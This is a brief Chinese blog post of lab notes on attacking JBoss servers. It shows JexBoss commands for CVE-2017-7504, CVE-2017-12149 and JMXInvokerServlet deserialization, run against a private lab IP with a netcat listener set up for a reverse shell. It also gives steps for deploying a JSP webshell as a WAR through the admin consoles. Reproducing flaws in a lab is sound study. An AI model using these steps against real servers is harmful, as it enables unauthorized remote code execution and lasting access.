JBoss

1.JexBoss

漏洞检测获取交互shell的工具,https://github.com/joaomatosf/jexboss

2.漏洞复现

CVE-2017-7504

python jexboss.py -u http://192.168.135.131:8080/
yes

CVE-2017-12149

先用NC监听

python jexboss.py -u http://192.168.135.131:8080/
yes
IP
端口

JMXInvokerServlet-deserialization

先用NC监听

python jexboss.py -u http://192.168.135.131:8080/
yes
IP
端口

后台GetShell

登录后台,路径:/jmx-console 或 /admin-console(>5.x要用这个)

如果是/jmx-console,进入flavor=URL,type=DeploymentScanner

如果是/admin-console,进入左列的Web Application (WAR)s

将JSP一句话木马制作为war包

jar cvf shell.war shell.jsp

如果是/jmx-console,找到 java.lang.String 的 addURL,输入一句话木马的URL点击invoke

如果是/admin-console,选择本地文件添加

一句话木马路径:/shell/shell.jsp(根据自己的文件名改)

posted @ 2023-01-12 21:24  Hacker&Cat  阅读(87)  评论(0编辑  收藏  举报